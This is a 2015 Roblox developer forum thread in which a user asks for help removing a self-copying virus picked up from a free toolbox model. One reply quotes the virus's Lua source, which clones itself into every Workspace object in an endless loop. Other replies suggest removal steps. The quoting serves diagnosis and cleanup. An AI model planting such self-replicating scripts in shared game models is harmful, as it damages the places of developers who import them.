|
| 27 Apr 2015 02:45 PM |
| I Have a virus on my studio. A self copying virus and I don't know how to get rid of it! its a big map so I cant go through every brick, model and cylinder deleting it! Can anyone help? |
|
|
| Report Abuse |
|
|
jjkolo
|
  |
| Joined: 20 Sep 2009 |
| Total Posts: 7291 |
|
| |
|
Kamov
|
  |
| Joined: 07 Aug 2008 |
| Total Posts: 29015 |
|
| |
|
bloxxyz
|
  |
| Joined: 15 Apr 2012 |
| Total Posts: 6995 |
|
| |
|
|
| 27 Apr 2015 02:48 PM |
| I know most free models have viruses in, I couldn't be bothered to make a barn so I got one from toolbox |
|
|
| Report Abuse |
|
|
|
| 27 Apr 2015 02:49 PM |
virus:
function haxor() x = game.Workspace:GetChildren() for i = 1, #x do if x[i]:FindFirstChild("zacksisk") == nil then local w = Instance.new("Weld") w.Parent = x[i] w.Name = "zacksisk" s = script:clone() s.Parent = w s.Name = "zacksisk" end end end
while true do haxor() wait(.1) end |
|
|
| Report Abuse |
|
|
|
| 27 Apr 2015 02:51 PM |
| What I would do is remove studio from your PC, and re-download it and see if that works. |
|
|
| Report Abuse |
|
|
SouITheif
|
  |
| Joined: 06 Apr 2011 |
| Total Posts: 2242 |
|
| |
|
|
| 27 Apr 2015 02:53 PM |
| its a script in the actual studio so it wouldn't work, I also used ro-defender and that doesn't work |
|
|
| Report Abuse |
|
|
|
| 27 Apr 2015 02:54 PM |
| Rename Workspace to anything else temporarily to break the virus script. |
|
|
| Report Abuse |
|
|
|
| 27 Apr 2015 02:54 PM |
| As I usally do.... I go into a NEW place, I insert the model I want to use there, remove the viruses, stupid scripts, fire E.T.C. And then I place it into my game.. |
|
|
| Report Abuse |
|
|
| |
|
Kamov
|
  |
| Joined: 07 Aug 2008 |
| Total Posts: 29015 |
|
|
| 27 Apr 2015 02:56 PM |
| repeat workspace:findFirstChild("zacksisk", true):Destroy() until workspace:findFirstChild("zacksisk", true) == nil |
|
|
| Report Abuse |
|
|
|
| 27 Apr 2015 02:57 PM |
| Screw it! im going to be here for 3 days deleting it! XD wish me luck! |
|
|
| Report Abuse |
|
|
Voolz
|
  |
| Joined: 12 Dec 2014 |
| Total Posts: 5819 |
|
| |
|
|
| 27 Apr 2015 03:01 PM |
| Wouldn't it go back if the scripts are running? Right clicking Workspace and renaming it would make the "x = game.Workspace:GetChildren()" line invalid as there would be nothing called "Workspace". That way, the loop which repeats the infect function stops working. |
|
|
| Report Abuse |
|
|